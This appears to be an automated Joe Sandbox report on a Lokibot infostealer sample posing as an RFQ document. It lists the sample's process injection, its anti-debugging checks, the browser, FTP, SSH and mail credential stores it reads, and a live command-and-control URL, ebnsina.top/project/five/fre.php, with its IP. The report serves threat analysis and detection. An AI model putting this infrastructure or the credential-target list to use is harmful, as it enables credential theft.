Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Thread sleep count: Count: 4700 delay: -5

Jump to behavior

Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Code function: 0_2_0040687E FindFirstFileW,FindClose,	0_2_0040687E
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Code function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C2D

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 60000			Jump to behavior

Source: ImagingDevices.exe, 00000013.00000002.2864657089.0000000003DEF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW[
Source: ImagingDevices.exe, 00000013.00000002.2864657089.0000000003D98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(^
Source: ImagingDevices.exe, 00000013.00000002.2864657089.0000000003DEF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	API call chain: ExitProcess graph end node			graph_0-3838
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	API call chain: ExitProcess graph end node			graph_0-3835

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 1_2_02C7DAC0 LdrInitializeThunk,LdrInitializeThunk,

1_2_02C7DAC0

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Code function: 19_2_002F1BA9 LoadLibraryW,GetProcAddress,GetDesktopWindow,GetLastError,FreeLibrary,GetLastError,

19_2_002F1BA9

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Code function: 19_2_002F2523 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

19_2_002F2523

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe base: 2EE0000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe base: 2EAFFE8			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Code function: 19_2_002F23D5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

19_2_002F23D5

Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe

0_2_004034FC

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000013.00000002.2864657089.0000000003E01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ImagingDevices.exe PID: 7560, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Remote Access Functionality

Yara detected Lokibot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000013.00000002.2864657089.0000000003E01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ImagingDevices.exe PID: 7560, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Obfuscated Files or Information	1 Credentials in Registry	2 File and Directory Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	Logon Script (Windows)	111 Process Injection	1 DLL Side-Loading	Security Account Manager	17 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	Login Hook	Login Hook	2 Masquerading	NTDS	111 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	15 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	41 Virtualization/Sandbox Evasion	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
RFQ-SulselBarruII2-COALCOMMLDOC.exe	5%	ReversingLabs
RFQ-SulselBarruII2-COALCOMMLDOC.exe	10%	Virustotal		Browse
RFQ-SulselBarruII2-COALCOMMLDOC.exe	100%	Avira	HEUR/AGEN.1333748

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\RFQ-SulselBarruII2-COALCOMMLDOC.exe	100%	Avira	HEUR/AGEN.1333748
C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\RFQ-SulselBarruII2-COALCOMMLDOC.exe	5%	ReversingLabs
C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\RFQ-SulselBarruII2-COALCOMMLDOC.exe	10%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
ebnsina.top	19%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
http://crl.microsoft	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://ebnsina.top/project/five/fre.php	100%	Avira URL Cloud	malware
http://ebnsina.top/project/five/fre.php	17%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ebnsina.top	104.21.13.124	true	true	19%, Virustotal, Browse	unknown
drive.google.com	192.178.50.78	true	false		high
drive.usercontent.google.com	192.178.50.65	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ebnsina.top/project/five/fre.php	true	17%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.google.com	ImagingDevices.exe, 00000013.00000003.1894904693.0000000003E45000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000013.00000002.2864657089.0000000003DEF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.1922214480.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.1920159681.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.1920159681.0000000004A71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoft	powershell.exe, 00000001.00000002.1923493560.0000000007207000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.1920159681.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/	ImagingDevices.exe, 00000013.00000002.2864657089.0000000003D98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000001.00000002.1922214480.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.1922214480.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000001.00000002.1922214480.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000001.00000002.1922214480.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drive.usercontent.google.com/	ImagingDevices.exe, 00000013.00000003.1919299683.0000000003E06000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000013.00000002.2864657089.0000000003E01000.00000004.00000020.00020000.00000000.sdmp	false		high
https://apis.google.com	ImagingDevices.exe, 00000013.00000003.1894904693.0000000003E45000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000013.00000002.2864657089.0000000003DEF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	RFQ-SulselBarruII2-COALCOMMLDOC.exe, RFQ-SulselBarruII2-COALCOMMLDOC.exe.1.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.1920159681.0000000004A71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.1920159681.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
192.178.50.78	drive.google.com	United States	15169	GOOGLEUS	false
192.178.50.65	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
104.21.13.124	ebnsina.top	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1419146
Start date and time:	2024-04-03 06:36:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	RFQ-SulselBarruII2-COALCOMMLDOC.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@36/14@3/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 91% Number of executed functions: 109 Number of non-executed functions: 46
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 5688 because it is empty
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:36:56	API Interceptor	43x Sleep call for process: powershell.exe modified
06:37:27	API Interceptor	113x Sleep call for process: ImagingDevices.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.13.124	Customer_Requirements__Pricing.doc	Get hash	malicious	FormBook	Browse	zsin2.ebnsina.top/_errorpages/ebilezx.exe
	4500379220.exe	Get hash	malicious	FormBook	Browse	www.childersburgtowing.top/g05b/?txl0dbP=45cmbAnGpwAdg5D4WgOA61IjiaeSIOnoSNqmlnmCtftCO/+ros6ZzExjgudTN/XLvw9F&kRj0=Jh_T1J
	JW-0235-Shipping_Mark-1109-013-23-094.exe	Get hash	malicious	Lokibot	Browse	305.ebnsina.top/_errorpages/305/five/fre.php
	Receipt_copy06112023.exe	Get hash	malicious	Lokibot	Browse	305.ebnsina.top/_errorpages/305/five/fre.php
	CIBC_Bank_Advice-lNRar0000300Z9Wu99984003kQefwn-pdf.exe	Get hash	malicious	Lokibot	Browse	zsin2.ebnsina.top/_errorpages/zsin2/five/fre.php
	CONTRACT-SCANAL2AOXctymON5KJ-PDF.exe	Get hash	malicious	Lokibot	Browse	zsin2.ebnsina.top/_errorpages/zsin2/five/fre.php
	Textile-Material-Docx.exe	Get hash	malicious	Lokibot	Browse	zsin2.ebnsina.top/_errorpages/zsin2/five/fre.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ebnsina.top	Corresponding Details.exe	Get hash	malicious	Lokibot	Browse	172.67.167.246
	wrYmyTer6N.rtf	Get hash	malicious	FormBook	Browse	172.67.167.246
	DHL_Parcel_#29721.docx.doc	Get hash	malicious	FormBook	Browse	172.67.167.246
	Customer_Requirements__Pricing.doc	Get hash	malicious	FormBook	Browse	104.21.13.124
	SD8319778482.doc	Get hash	malicious	AgentTesla	Browse	172.67.167.246
	JW-0235-Shipping_Mark-1109-013-23-094.exe	Get hash	malicious	Lokibot	Browse	104.21.13.124
	Receipt_copy06112023.exe	Get hash	malicious	Lokibot	Browse	104.21.13.124
	CIBC_Bank_Advice-lNRar0000300Z9Wu99984003kQefwn-pdf.exe	Get hash	malicious	Lokibot	Browse	172.67.167.246
	CONTRACT-SCANAL2AOXctymON5KJ-PDF.exe	Get hash	malicious	Lokibot	Browse	104.21.13.124
	Textile-Material-Docx.exe	Get hash	malicious	Lokibot	Browse	172.67.167.246

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.15700.19501.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://attemptingto.takeyoutoyourdomain.com/lachlan.tipler@lendlease.com	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	file.exe	Get hash	malicious	LummaC	Browse	104.21.72.132
	https://www.evernote.com/shard/s552/sh/411b8c38-1480-cda3-f001-f816c49f703f/uRh6bfj69yGnZ1eQwP_G4v_jhDHo3CJrKQvlhg51RfeJOz6BkV4CCSNrEg	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://pub-786875329a4d4b229f9b36d89910de25.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	https://bafybeidi6dmg4h3ws6ttkejiyralaxrtcccbqjwk7y7afk4z2jqqhtlftu.ipfs.dweb.link/rfcbnff73.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://pub-422f33674c4b4fe182123a25dbb97378.r2.dev/secu3.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://hon-3mo.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	172.66.47.204
	SecuriteInfo.com.Trojan.PWS.Siggen3.25256.942.20710.exe	Get hash	malicious	Exela Stealer, Xmrig	Browse	162.159.135.232

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	SecuriteInfo.com.Win32.Packed.NoobyProtect.B.24865.10880.exe	Get hash	malicious	Unknown	Browse	192.178.50.65 192.178.50.78
	file.exe	Get hash	malicious	Vidar	Browse	192.178.50.65 192.178.50.78
	2LfSD1iMxK.exe	Get hash	malicious	CryptOne	Browse	192.178.50.65 192.178.50.78
	UM-L24-433-50#U00b7pdf.vbs	Get hash	malicious	GuLoader, Lokibot	Browse	192.178.50.65 192.178.50.78
	Solicitud de presupuestos_CA 4-2-2024#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	192.178.50.65 192.178.50.78
	UM-2400911-Ponudba#U00b7pdf.vbs	Get hash	malicious	GuLoader, Lokibot	Browse	192.178.50.65 192.178.50.78
	agamogenetic.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	192.178.50.65 192.178.50.78
	RFQ.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	192.178.50.65 192.178.50.78
	Payroll Authorization pdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	192.178.50.65 192.178.50.78
	shipdoc_PO_09042024.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	192.178.50.65 192.178.50.78

Process:	C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
Category:	dropped
Size (bytes):	892
Entropy (8bit):	3.2523301114348917
Encrypted:	false
SSDEEP:	12:8wl0O0sXowAOcuJEIZ9ZltlmR9OQSmltlvoRKQ1wlFsAlqO3lYPRN1A4t2YZ/elr:8eLgO9Zlt4rOQbltto96x3lYz+qy
MD5:	F84967EDD9B9FFDC72D697F60B6065BB
SHA1:	9CB0F00FAE32EAE9FF2F650762C93CFCFE8FCE7D
SHA-256:	508BF6303759364A05EDA18267C9BABAD41793170C65422B2A8F467F7FAECDD1
SHA-512:	95D83F3B9EAFFC90652ED112A2142A3E42269C2C97D9E691D8B8CB700F3215C037D8BF1ACC86B3610877C4EBAA00249785C4A9A9AB4F4D99099DD615462AAD68
Malicious:	false
Preview:	L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....\.1...........Documents.D............................................D.o.c.u.m.e.n.t.s.....l.2...........komplement.epi..N............................................k.o.m.p.l.e.m.e.n.t...e.p.i.......*.....\.....\.U.s.e.r.s.\.j.o.n.e.s.\.D.o.c.u.m.e.n.t.s.\.k.o.m.p.l.e.m.e.n.t...e.p.i.;.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.U.b.a.r.b.e.r.e.t.\.G.r.a.u.s.t.a.r.k.\.r.e.s.u.l.t.a.l.e.t.............)...............#.F..l.H.i.)...............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	8003
Entropy (8bit):	4.838950934453595
Encrypted:	false
SSDEEP:	192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
MD5:	4C24412D4F060F4632C0BD68CC9ECB54
